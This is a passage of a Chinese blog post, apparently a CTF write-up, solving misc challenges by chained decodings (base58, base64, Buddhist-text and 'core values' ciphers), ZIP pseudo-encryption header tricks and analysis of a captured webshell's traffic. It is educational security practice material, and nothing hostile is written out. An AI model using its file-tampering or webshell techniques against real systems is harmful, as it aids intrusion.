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</span><br></pre></td></tr></table></figure></p>
<p>base解码，base16,32,64都不行，使用base58时：</p>
<p><img src="17.png" alt="17"></p>
<p>解出来看开头可以发现data:image/bmp;base64,数据格式为图片，使用base64编码，那么思路就是base64转图片</p>
<p><img src="18.png" alt="18"></p>
<p>扫描图片二维码<br>最终可得：<span id="inline-red">jactf{base58_base64_flag_very_easy}</span></p>
<h3 id="这是什么玩意儿"><a href="#这是什么玩意儿" class="headerlink" title="这是什么玩意儿"></a>这是什么玩意儿</h3><p>打开文件后将内容进行Quoted-Printable解码，可得佛语：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">佛曰：梵僧奢楞奢吉若奢不帝冥夜是缽朋缽真特俱上罰能皤室阿諳明一切呐除梵姪缽婆呐亦參侄呼皤世哆特哆故勝諳爍謹智皤參孕逝諳謹漫死即侄除哆逝侄是奢喝礙豆諳楞無俱者哆度者。諳真冥訶侄勝竟藝奢不伊皤謹涅孕無他羅大得闍哆喝耶僧無羯滅除利缽多梵夷梵栗缽者孕諳盧皤三罰寫老梵耶室帝梵寫羯數梵盡侄栗侄藐俱世諳上諳姪數室婆罰槃奢訶哆多逝藐道梵楞梵南侄迦呐知朋楞侄離呐沙呐智遮大室神冥輸殿缽槃梵怛恐舍知皤迦奢般諳爍寫漫伊俱栗哆他亦缽楞怛冥呼切俱菩舍呐實栗奢波摩諳道缽瑟哆實皤爍勝薩罰諸奢般諦罰明缽諦尼哆楞佛俱醯諳滅度哆所槃姪麼所恐諳他侄寫瑟侄所得隸哆闍呐提盧冥咒奢曰呐沙怯般南怯地缽喝冥想呐盧罰謹呼跋缽上娑諦死侄迦</span><br></pre></td></tr></table></figure></p>
<p>再进行与佛论禅解密<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">公正友善自由公正民主公正和谐法治自由公正公正法治友善平等公正爱国公正平等法治爱国公正敬业公正友善爱国平等诚信平等法治敬业法治平等公正公正公正诚信平等平等友善敬业法治民主法治富强法治友善法治</span><br></pre></td></tr></table></figure></p>
<p>最后是社会主义价值观解码<br>最终可得：<span id="inline-red">jactf{hexin_yufo_qp}</span></p>
<h3 id="真的不是图片"><a href="#真的不是图片" class="headerlink" title="真的不是图片"></a>真的不是图片</h3><p>使用binwalk，发现有一个zip</p>
<p><img src="20.png" alt="20"></p>
<p>但是使用foremost分离并没有分离出.zip文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">补充 zip伪加密：</span><br><span class="line"></span><br><span class="line">zip文件由三部分组成：</span><br><span class="line">压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志 </span><br><span class="line"></span><br><span class="line">压缩源文件数据区： </span><br><span class="line">头文件标记：50 4B 03 04 （0x04034b50）</span><br><span class="line">解压文件所需pkware版本： 14 00</span><br><span class="line">全局方式位标记(有无加密)： 00 00</span><br><span class="line">压缩方式: 08 00</span><br><span class="line">　最后修改文件时间             2 bytes</span><br><span class="line">　最后修改文件日期             2 bytes</span><br><span class="line">　CRC-32校验                  4 bytes</span><br><span class="line">　压缩后尺寸                  4 bytes</span><br><span class="line">　未压缩尺寸                  4 bytes</span><br><span class="line">　文件名长度                  2 bytes</span><br><span class="line">  扩展记录长度                2 bytes</span><br><span class="line">  文件名                     （不定长度）</span><br><span class="line">  扩展字段                   （不定长度）</span><br><span class="line">  ……</span><br><span class="line"></span><br><span class="line">压缩源文件目录区： </span><br><span class="line">目录中文件文件头标记： 50 4B 01 02 (0x02014b50)</span><br><span class="line">解压文件所需 pkware 版本： 14 00</span><br><span class="line">全局方式位标记（有无加密，这个更改这里进行伪加密，改为09 00打开就会提示有密码了）： 00 00</span><br><span class="line">……</span><br><span class="line"></span><br><span class="line">压缩源文件目录结束标志： </span><br><span class="line">目录结束标记： 50 4B 05 06</span><br><span class="line">……</span><br></pre></td></tr></table></figure>
<p>winhex打开图片发现少了zip文件头，寻找压缩源文件数据区的标志（在数据区寻找14000000）</p>
<p><img src="22.png" alt="22"></p>
<p>发现头文件标记：50 4B 03 04被替换成了6a613636也就是<code>ja66</code>(解压密码)</p>
<p><img src="21.png" alt="21"></p>
<p>将图片修改之后再次进行binwalk分析和foremost提取</p>
<p><img src="23.png" alt="23"></p>
<p>解压subject.zip时需要密码，而密码就是前面的<code>ja66</code>,最后可以得到很多文件夹，每个文件夹里都有一个内容为一个字符的文本<br>编写脚本：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">import base64</span><br><span class="line">flag=&apos;&apos;</span><br><span class="line">for i in range(32):</span><br><span class="line">    f = open(&apos;./subject/&apos; + str(i) +&apos;/&apos; + str(i) + &apos;.txt&apos;,&apos;r&apos;)</span><br><span class="line">    flag += f.read()</span><br><span class="line"></span><br><span class="line">flag = base64.b64decode(flag)</span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure></p>
<p>最终可得：<span id="inline-red">jactf{64se64_1s_50_c001}</span></p>
<h3 id="你对我网站做了什么？"><a href="#你对我网站做了什么？" class="headerlink" title="你对我网站做了什么？"></a>你对我网站做了什么？</h3><p>这是一道流量分析题，打开shell.pcap数据包，直接查看HTTP流量包<br>在最后的POST请求中可以发现catflag.php文件，以及它的返回包中有一串加密的字符</p>
<p><img src="24.png" alt="24"></p>
<p><img src="25.png" alt="25"></p>
<p>使用HTTP追踪流，查看源码</p>
<p><img src="26.png" alt="26"></p>
<p><img src="27.png" alt="27"></p>
<p>直接编写php代码进行逆转</p>
<p><img src="28.png" alt="28"></p>
<p>最终可得：<span id="inline-red">flag{U_f1nd_Me!}</span></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf-writeup/" rel="tag"># ctf writeup</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/04/03/python网络爬虫-requests库/" rel="next" title="python网络爬虫--requests库">
                <i class="fa fa-chevron-left"></i> python网络爬虫--requests库
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/04/15/python-基础补充/" rel="prev" title="python-基础补充">
                python-基础补充 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/download.jpg" alt="Wenz1">
            
              <p class="site-author-name" itemprop="name">Wenz1</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">8</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          <div id="music163player">
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="86" src="//music.163.com/outchain/player?type=2&id=586299&auto=1&height=66"></iframe>
</div>
        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#web"><span class="nav-number">1.</span> <span class="nav-text">web</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#web签到"><span class="nav-number">1.1.</span> <span class="nav-text">web签到</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#not-easy"><span class="nav-number">1.2.</span> <span class="nav-text">not_easy</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#简单介绍create-function-代码注入"><span class="nav-number">1.2.1.</span> <span class="nav-text">简单介绍create_function()代码注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#下载下载"><span class="nav-number">1.3.</span> <span class="nav-text">下载下载</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#曲折的人生"><span class="nav-number">1.4.</span> <span class="nav-text">曲折的人生</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#misc"><span class="nav-number">2.</span> <span class="nav-text">misc</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#so-easy"><span class="nav-number">2.1.</span> <span class="nav-text">so_easy</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#这是什么玩意儿"><span class="nav-number">2.2.</span> <span class="nav-text">这是什么玩意儿</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#真的不是图片"><span class="nav-number">2.3.</span> <span class="nav-text">真的不是图片</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#你对我网站做了什么？"><span class="nav-number">2.4.</span> <span class="nav-text">你对我网站做了什么？</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Wenz1</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>

<!-- 页面点击小红心 -->
<!-- <script type="text/javascript" src="/js/src/love.js"></script> -->

</html>
